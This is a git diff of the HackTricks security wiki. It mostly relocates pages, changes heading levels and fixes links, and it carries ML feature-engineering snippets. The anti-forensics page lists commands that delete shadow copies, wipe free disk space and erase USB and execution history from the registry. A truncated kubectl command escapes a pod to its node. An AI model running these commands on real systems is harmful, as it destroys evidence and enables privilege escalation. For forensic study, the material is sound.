**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/bim-bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md
similarity index 94%
rename from external-platforms-reviews-writeups/bra.i.nsmasher-presentation/bim-bruteforcer.md
rename to a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md
index 7eae9aa05..b03fcdb6a 100644
--- a/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/bim-bruteforcer.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md
@@ -1,4 +1,4 @@
-
+# BIM Bruteforcer
@@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## BRUTEFORCER CORE SCRIPT WITH BIM ATTACK
-# BRUTEFORCER CORE SCRIPT WITH BIM ATTACK
-
-This time we introduce a new type of gradient based attack, in order to brute force an image classification app \(can be shaped and used for any input of course\), the BIM, or Basic Iteration Method.
+This time we introduce a new type of gradient based attack, in order to brute force an image classification app (can be shaped and used for any input of course), the BIM, or Basic Iteration Method.
Itās recommended to see at least the explanation in the [**introduction challenge colab Notebook**](https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR)
@@ -31,8 +30,6 @@ As usual we will provide only the A.I. attack core part, itās up to you to com
Remember, in those kind of scenarios, in order to mime real-based attack applications, we donāt have the exact model to fool or the image target in which we would like to transform our image. Thatās why, in order to overcome this issue, we must blend our core script, with a bruteforcer logic, accordingly to the application responses we want to fool.
{% endhint %}
-
-
Support HackTricks and get benefits!
@@ -48,5 +45,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md b/a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md
similarity index 93%
rename from external-platforms-reviews-writeups/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md
rename to a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md
index 523fd0bf7..85953bf0b 100644
--- a/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md
@@ -1,4 +1,4 @@
-
+# Hybrid Malware Classifier Part 1
@@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## A.I. HYBRID MALWARE CLASSIFIER
-# A.I. HYBRID MALWARE CLASSIFIER
-
-## INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS \(Part 1\)
+### INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS (Part 1)
In this series of notebook we are going to build an **hybrid malware classifier.**
@@ -35,9 +34,7 @@ For the **Fourth Part** For the Fourth Part we will add some tactics to add robu
There are also many available datasets for Static and/ or Dynamic Malware analysis on several sites for this type of classification, like Ember, VirusShare, Sorel-20M, but i strongly encourage that you build one or your own.
-Hereās the link to our [**colab notebook**](https://colab.research.google.com/drive/1nNZLMogXF-iq-_78IvGTd-c89_C82AB8#scrollTo=lUHLMl8Pusrn) enjoy and stay safe :\)
-
-
+Hereās the link to our [**colab notebook**](https://colab.research.google.com/drive/1nNZLMogXF-iq-\_78IvGTd-c89\_C82AB8#scrollTo=lUHLMl8Pusrn) enjoy and stay safe :)
@@ -54,5 +51,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/radio-hacking/README.md b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md
similarity index 99%
rename from radio-hacking/README.md
rename to a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md
index eb7ae3e41..fe38a947b 100644
--- a/radio-hacking/README.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md
@@ -1,4 +1,4 @@
-
+# ML Basics
@@ -16,9 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-
-
Support HackTricks and get benefits!
@@ -34,5 +31,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md
similarity index 97%
rename from external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md
rename to a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md
index bd2cf080f..16a2a812a 100644
--- a/external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md
@@ -1,4 +1,4 @@
-
+# Feature Engineering
@@ -16,14 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic types of possible data
+## Basic types of possible data
Data can be **continuous** (**infinity** values) or **categorical** (nominal) where the amount of possible values are **limited**.
-## Categorical types
+### Categorical types
-### Binary
+#### Binary
Just **2 possible values**: 1 or 0. In case in a dataset the values are in string format (e.g. "True" and "False") you assign numbers to those values with:
@@ -31,7 +30,7 @@ Just **2 possible values**: 1 or 0. In case in a dataset the values are in strin
dataset["column2"] = dataset.column2.map({"T": 1, "F": 0})
```
-### **Ordinal**
+#### **Ordinal**
The **values follows an order**, like in: 1st place, 2nd place... If the categories are strings (like: "starter", "amateur", "professional", "expert") you can map them to numbers as we saw in the binary case.
@@ -50,7 +49,7 @@ possible_values_mapping = {value:idx for idx,value in enumerate(possible_values_
dataset['column2'] = dataset.column2.map(possible_values_mapping)
```
-### **Cyclical**
+#### **Cyclical**
Looks **like ordinal value** because there is an order, but it doesn't mean one is bigger than the other. Also the **distance between them depends on the direction** you are counting. Example: The days of the week, Sunday isn't "bigger" than Monday.
@@ -61,7 +60,7 @@ column2_dummies = pd.get_dummies(dataset.column2, drop_first=True)
dataset_joined = pd.concat([dataset[['column2']], column2_dummies], axis=1)
```
-### **Dates**
+#### **Dates**
Date are **continuous** **variables**. Can be seen as **cyclical** (because they repeat) **or** as **ordinal** variables (because a time is bigger than a previous one).
@@ -95,7 +94,7 @@ dataset['weekday'] = dataset.transaction_date.dt.weekday
dataset['day_name'] = dataset.transaction_date.apply(lambda x: x.day_name())
```
-### Multi-category/nominal
+#### Multi-category/nominal
**More than 2 categories** with no related order. Use `dataset.describe(include='all')` to get information about the categories of each feature.
@@ -108,7 +107,7 @@ You can get a **multi-category column one-hot encoded** with `pd.get_dummies(dat
You can get a **multi-category column dummie encoded** with `pd.get_dummies(dataset.column1, drop_first=True)`. This will transform all the classes in binary features, so this will create **one new column per possible class minus one** as the **last 2 columns will be reflect as "1" or "0" in the last binary column created**. This will avoid perfect multicollinearity, reducing the relations between columns.
-# Collinear/Multicollinearity
+## Collinear/Multicollinearity
Collinear appears when **2 features are related to each other**. Multicollineratity appears when those are more than 2.
@@ -126,7 +125,7 @@ X = add_constant(onehot_encoded) # Add previously one-hot encoded data
print(pd.Series([variance_inflation_factor(X.values,i) for i in range(X.shape[1])], index=X.columns))
```
-# Categorical Imbalance
+## Categorical Imbalance
This occurs when there is **not the same amount of each category** in the training data.
@@ -175,7 +174,7 @@ You can use the argument **`sampling_strategy`** to indicate the **percentage**
Undersamplig or Oversampling aren't perfect if you get statistics (with `.describe()`) of the over/under-sampled data and compare them to the original you will see **that they changed.** Therefore oversampling and undersampling are modifying the training data.
{% endhint %}
-## SMOTE oversampling
+### SMOTE oversampling
**SMOTE** is usually a **more trustable way to oversample the data**.
@@ -190,13 +189,13 @@ dataset['target_column'] = y_smote
print(y_smote.value_counts()) #Confirm data isn't imbalanced anymore
```
-# Rarely Occurring Categories
+## Rarely Occurring Categories
Imagine a dataset where one of the target classes **occur very little times**.
This is like the category imbalance from the previous section, but the rarely occurring category is occurring even less than "minority class" in that case. The **raw** **oversampling** and **undersampling** methods could be also used here, but generally those techniques **won't give really good results**.
-## Weights
+### Weights
In some algorithms it's possible to **modify the weights of the targeted data** so some of them get by default more importance when generating the model.
@@ -207,13 +206,13 @@ model = LogisticRegression(class_weight=weights)
You can **mix the weights with over/under-sampling techniques** to try to improve the results.
-## PCA - Principal Component Analysis
+### PCA - Principal Component Analysis
Is a method that helps to reduce the dimensionality of the data. It's going to **combine different features** to **reduce the amount** of them generating **more useful features** (_less computation is needed_).
The resulting features aren't understandable by humans, so it also **anonymize the data**.
-# Incongruent Label Categories
+## Incongruent Label Categories
Data might have mistakes for unsuccessful transformations or just because human error when writing the data.
@@ -223,7 +222,7 @@ You can clean this issues by lowercasing everything and mapping misspelled label
It's very important to check that **all the data that you have contains is correctly labeled**, because for example, one misspelling error in the data, when dummie encoding the classes, will generate a new column in the final features with **bad consequences for the final model**. This example can be detected very easily by one-hot encoding a column and checking the names of the columns created.
-# Missing Data
+## Missing Data
Some data of the study may be missing.
@@ -291,7 +290,7 @@ dataset.iloc[10:20] # Get some indexes that contained empty data before
To fill categorical data first of all you need to think if there is any reason why the values are missing. If it's by **choice of the users** (they didn't want to give the data) maybe yo can **create a new category** indicating that. If it's because of human error you can **remove the rows** or the **feature** (check the steps mentioned before) or **fill it with the mode, the most used category** (not recommended).
-# Combining Features
+## Combining Features
If you find **two features** that are **correlated** between them, usually you should **drop** one of them (the one that is less correlated with the target), but you could also try to **combine them and create a new feature**.
@@ -308,7 +307,6 @@ X = add_constant(dataset[['column1', 'column2', 'target']])
pd.Series([variance_inflation_factor(X.values, i) for i in range(X.shape[1])], index=X.columns)
```
-
Support HackTricks and get benefits!
@@ -324,5 +322,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/blockchain/blockchain-and-crypto-currencies/page-1.md b/blockchain/blockchain-and-crypto-currencies/page-1.md
deleted file mode 100644
index eb7ae3e41..000000000
--- a/blockchain/blockchain-and-crypto-currencies/page-1.md
+++ /dev/null
@@ -1,38 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-**Join the** [**š¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**š¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-
-
-
-
-Support HackTricks and get benefits!
-
-Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-**Join the** [**š¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**š¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/backdoors/empire.md b/c2/empire.md
similarity index 100%
rename from backdoors/empire.md
rename to c2/empire.md
diff --git a/backdoors/icmpsh.md b/c2/icmpsh.md
similarity index 100%
rename from backdoors/icmpsh.md
rename to c2/icmpsh.md
diff --git a/backdoors/merlin.md b/c2/merlin.md
similarity index 100%
rename from backdoors/merlin.md
rename to c2/merlin.md
diff --git a/backdoors/salseo.md b/c2/salseo.md
similarity index 100%
rename from backdoors/salseo.md
rename to c2/salseo.md
diff --git a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md
index 095be9279..87fae6c01 100644
--- a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md
+++ b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md
@@ -163,8 +163,8 @@ kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hos
Now that you can escape to the node check post-exploitation techniques in:
-{% content-ref url="../attacking-kubernetes-from-inside-a-pod.md" %}
-[attacking-kubernetes-from-inside-a-pod.md](../attacking-kubernetes-from-inside-a-pod.md)
+{% content-ref url="../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %}
+[attacking-kubernetes-from-inside-a-pod.md](../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
{% endcontent-ref %}
#### Stealth
diff --git a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md b/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md
index 28b522333..3ea023b9a 100644
--- a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md
+++ b/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md
@@ -26,7 +26,7 @@ If you have compromised a pod inside a kubernetes environment, there are other p
### Service Account Tokens
-Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](./#architecture)**.**
+Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](../../pentesting/pentesting-kubernetes/#architecture)**.**
Taken from the Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server):
@@ -65,7 +65,7 @@ _**Hot pods are**_ pods containing a privileged service account token. A privile
## RBAC
-If you don't know what is **RBAC**, [**read this section**](./#cluster-hardening-rbac).
+If you don't know what is **RBAC**, [**read this section**](../../pentesting/pentesting-kubernetes/#cluster-hardening-rbac).
## Enumeration CheatSheet
@@ -204,8 +204,8 @@ kurl -i -s -k -X $'POST' \
You can learn more about **Kubernetes RBAC** in
-{% content-ref url="kubernetes-role-based-access-control-rbac.md" %}
-[kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md)
+{% content-ref url="../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md" %}
+[kubernetes-role-based-access-control-rbac.md](../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md)
{% endcontent-ref %}
**Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges:
diff --git a/cloud-security/pentesting-kubernetes/namespace-escalation.md b/cloud-security/pentesting-kubernetes/namespace-escalation.md
index 9fd4abde2..451ee3146 100644
--- a/cloud-security/pentesting-kubernetes/namespace-escalation.md
+++ b/cloud-security/pentesting-kubernetes/namespace-escalation.md
@@ -40,8 +40,8 @@ If you can escape to the node either because you have compromised a pod and you
All these techniques are explained in:
-{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %}
-[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md)
+{% content-ref url="../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %}
+[attacking-kubernetes-from-inside-a-pod.md](../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
{% endcontent-ref %}
diff --git a/external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md b/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md
similarity index 100%
rename from external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md
rename to courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md
diff --git a/blockchain/blockchain-and-crypto-currencies/README.md b/crypto-and-stego/blockchain-and-crypto-currencies.md
similarity index 100%
rename from blockchain/blockchain-and-crypto-currencies/README.md
rename to crypto-and-stego/blockchain-and-crypto-currencies.md
diff --git a/cryptography/certificates.md b/crypto-and-stego/certificates.md
similarity index 100%
rename from cryptography/certificates.md
rename to crypto-and-stego/certificates.md
diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md
similarity index 100%
rename from cryptography/cipher-block-chaining-cbc-mac-priv.md
rename to crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md
diff --git a/cryptography/crypto-ctfs-tricks.md b/crypto-and-stego/crypto-ctfs-tricks.md
similarity index 100%
rename from cryptography/crypto-ctfs-tricks.md
rename to crypto-and-stego/crypto-ctfs-tricks.md
diff --git a/reversing/cryptographic-algorithms/README.md b/crypto-and-stego/cryptographic-algorithms/README.md
similarity index 100%
rename from reversing/cryptographic-algorithms/README.md
rename to crypto-and-stego/cryptographic-algorithms/README.md
diff --git a/reversing/cryptographic-algorithms/unpacking-binaries.md b/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md
similarity index 100%
rename from reversing/cryptographic-algorithms/unpacking-binaries.md
rename to crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md
diff --git a/cryptography/electronic-code-book-ecb.md b/crypto-and-stego/electronic-code-book-ecb.md
similarity index 100%
rename from cryptography/electronic-code-book-ecb.md
rename to crypto-and-stego/electronic-code-book-ecb.md
diff --git a/stego/esoteric-languages.md b/crypto-and-stego/esoteric-languages.md
similarity index 100%
rename from stego/esoteric-languages.md
rename to crypto-and-stego/esoteric-languages.md
diff --git a/cryptography/hash-length-extension-attack.md b/crypto-and-stego/hash-length-extension-attack.md
similarity index 100%
rename from cryptography/hash-length-extension-attack.md
rename to crypto-and-stego/hash-length-extension-attack.md
diff --git a/cryptography/padding-oracle-priv.md b/crypto-and-stego/padding-oracle-priv.md
similarity index 100%
rename from cryptography/padding-oracle-priv.md
rename to crypto-and-stego/padding-oracle-priv.md
diff --git a/cryptography/rc4-encrypt-and-decrypt.md b/crypto-and-stego/rc4-encrypt-and-decrypt.md
similarity index 100%
rename from cryptography/rc4-encrypt-and-decrypt.md
rename to crypto-and-stego/rc4-encrypt-and-decrypt.md
diff --git a/stego/stego-tricks.md b/crypto-and-stego/stego-tricks.md
similarity index 100%
rename from stego/stego-tricks.md
rename to crypto-and-stego/stego-tricks.md
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/README.md b/forensics/basic-forensic-methodology/README.md
similarity index 96%
rename from generic-methodologies-and-resources/basic-forensic-methodology/README.md
rename to forensics/basic-forensic-methodology/README.md
index ff71273b0..083c7b638 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/README.md
+++ b/forensics/basic-forensic-methodology/README.md
@@ -1,4 +1,4 @@
-
+# Basic Forensic Methodology
@@ -16,7 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
{% hint style="danger" %}
Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?\
[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
@@ -25,20 +24,18 @@ Do you use **Hacktricks every day**? Did you find the book **very** **useful**?
If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**š¬**](https://emojipedia.org/speech-balloon/)[**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**š¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ā** on **github** to **motivate** **me** to continue developing this book.
-
-
In this section of the book we are going to learn about some **useful forensics tricks**.\
We are going to talk about partitions, file-systems, carving, memory, logs, backups, OSs, and much more.
So if you are doing a professional forensic analysis to some data or just playing a CTF you can find here useful interesting tricks.
-# Creating and Mounting an Image
+## Creating and Mounting an Image
{% content-ref url="image-adquisition-and-mount.md" %}
[image-adquisition-and-mount.md](image-adquisition-and-mount.md)
{% endcontent-ref %}
-# Malware Analysis
+## Malware Analysis
This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**:
@@ -46,7 +43,7 @@ This **isn't necessary the first step to perform once you have the image**. But
[malware-analysis.md](malware-analysis.md)
{% endcontent-ref %}
-# Inspecting an Image
+## Inspecting an Image
if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
@@ -68,7 +65,7 @@ Depending on the used OSs and even platform different interesting artifacts shou
[docker-forensics.md](docker-forensics.md)
{% endcontent-ref %}
-# Deep inspection of specific file-types and Software
+## Deep inspection of specific file-types and Software
If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\
Read the following page to learn some interesting tricks:
@@ -83,19 +80,19 @@ I want to do a special mention to the page:
[browser-artifacts.md](specific-software-file-type-tricks/browser-artifacts.md)
{% endcontent-ref %}
-# Memory Dump Inspection
+## Memory Dump Inspection
{% content-ref url="memory-dump-analysis/" %}
[memory-dump-analysis](memory-dump-analysis/)
{% endcontent-ref %}
-# Pcap Inspection
+## Pcap Inspection
{% content-ref url="pcap-inspection/" %}
[pcap-inspection](pcap-inspection/)
{% endcontent-ref %}
-# **Anti-Forensic Techniques**
+## **Anti-Forensic Techniques**
Keep in mind the possible use of anti-forensic techniques:
@@ -103,14 +100,12 @@ Keep in mind the possible use of anti-forensic techniques:
[anti-forensic-techniques.md](anti-forensic-techniques.md)
{% endcontent-ref %}
-# Threat Hunting
+## Threat Hunting
{% content-ref url="file-integrity-monitoring.md" %}
[file-integrity-monitoring.md](file-integrity-monitoring.md)
{% endcontent-ref %}
-
-
Support HackTricks and get benefits!
@@ -126,5 +121,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md
similarity index 94%
rename from generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
rename to forensics/basic-forensic-methodology/anti-forensic-techniques.md
index 8f1e02f55..599c75b2b 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
+++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md
@@ -1,4 +1,4 @@
-
+# Anti-Forensic Techniques
@@ -16,21 +16,20 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Timestamps
+## Timestamps
An attacker may be interested in **changing the timestamps of files** to avoid being detected.\
-It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` __ and __ `$FILE_NAME`.
+It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` \_\_ and \_\_ `$FILE_NAME`.
Both attributes have 4 timestamps: **Modification**, **access**, **creation**, and **MFT registry modification** (MACE or MACB).
**Windows explorer** and other tools show the information from **`$STANDARD_INFORMATION`**.
-## TimeStomp - Anti-forensic Tool
+### TimeStomp - Anti-forensic Tool
This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**.
-## Usnjrnl
+### Usnjrnl
The **USN Journal** (Update Sequence Number Journal), or Change Journal, is a feature of the Windows NT file system (NTFS) which **maintains a record of changes made to the volume**.\
It's possible to use the tool [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) to search for modifications of this record.
@@ -39,7 +38,7 @@ It's possible to use the tool [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJ
The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file.
-## $LogFile
+### $LogFile
All metadata changes to a file system are logged to ensure the consistent recovery of critical file system structures after a system crash. This is called [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead\_logging).\
The logged metadata is stored in a file called ā**$LogFile**ā, which is found in a root directory of an NTFS file system.\
@@ -58,19 +57,19 @@ Using the same tool it's possible to identify to **which time the timestamps wer
* MTIME: File's MFT registry modifiction
* RTIME: File's access time
-## `$STANDARD_INFORMATION` and `$FILE_NAME` comparison
+### `$STANDARD_INFORMATION` and `$FILE_NAME` comparison
Another way to identify suspicions modified files would be to compare the time on both attributes looking for **mismatches**.
-## Nanoseconds
+### Nanoseconds
**NTFS** timestamps have a **precision** of **100 nanoseconds**. Then, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**.
-## SetMace - Anti-forensic Tool
+### SetMace - Anti-forensic Tool
This tool can modify both attributes `$STARNDAR_INFORMATION` and `$FILE_NAME` . However, from Windows Vista it's necessary a live OS to modify this information.
-# Data Hiding
+## Data Hiding
NFTS uses a cluster and the minimum information size. That means that if a file occupies uses and cluster and a half, the **reminding half is never going to be used** until the files is deleted. Then, it's possible to **hide data in this slack space**.
@@ -80,24 +79,24 @@ There are tools like slacker that allows to hide data in this "hidden" space. Ho
Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this can of tools can save the content obfuscated or even encrypted.
-# UsbKill
+## UsbKill
This is a tool that will **turn off the computer is any change in the USB** ports is detected.\
A way to discover this would be to inspect the running processes and **review each python script running**.
-# Live Linux Distributions
+## Live Linux Distributions
These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion.
-# Secure Deletion
+## Secure Deletion
[https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization)
-# Windows Configuration
+## Windows Configuration
It's possible to disable several windows logging methods to make the forensics investigation much harder.
-## Disable Timestamps - UserAssist
+### Disable Timestamps - UserAssist
This is a registry key that maintains dates and hours when each executable was run by the user.
@@ -106,7 +105,7 @@ Disabling UserAssist requires two steps:
1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled.
2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`.
-## Disable Timestamps - Prefetch
+### Disable Timestamps - Prefetch
This will save information about the applications executed with the goal of improving the performance of the Windows system. However, this can also be useful for forensics practices.
@@ -116,7 +115,7 @@ This will save information about the applications executed with the goal of impr
* Select Modify on each of these to change the value from 1 (or 3) to 0
* Restart
-## Disable Timestamps - Last Access Time
+### Disable Timestamps - Last Access Time
Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance.
@@ -125,14 +124,14 @@ Whenever a folder is opened from an NTFS volume on a Windows NT server, the syst
3. Look for `NtfsDisableLastAccessUpdate`. If it doesnāt exist, add this DWORD and set its value to 1, which will disable the process.
4. Close the Registry Editor, and reboot the server.
-## Delete USB History
+### Delete USB History
All the **USB Device Entries** are stored in Windows Registry Under **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device in your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\
You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to be sure you have deleted them (and to delete them).
Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted.
-## Disable Shadow Copies
+### Disable Shadow Copies
**List** shadow copies with `vssadmin list shadowstorage`\
**Delete** them running `vssadmin delete shadow`
@@ -149,28 +148,27 @@ To disable shadow copies:
It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
-## Overwrite deleted files
+### Overwrite deleted files
* You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive.
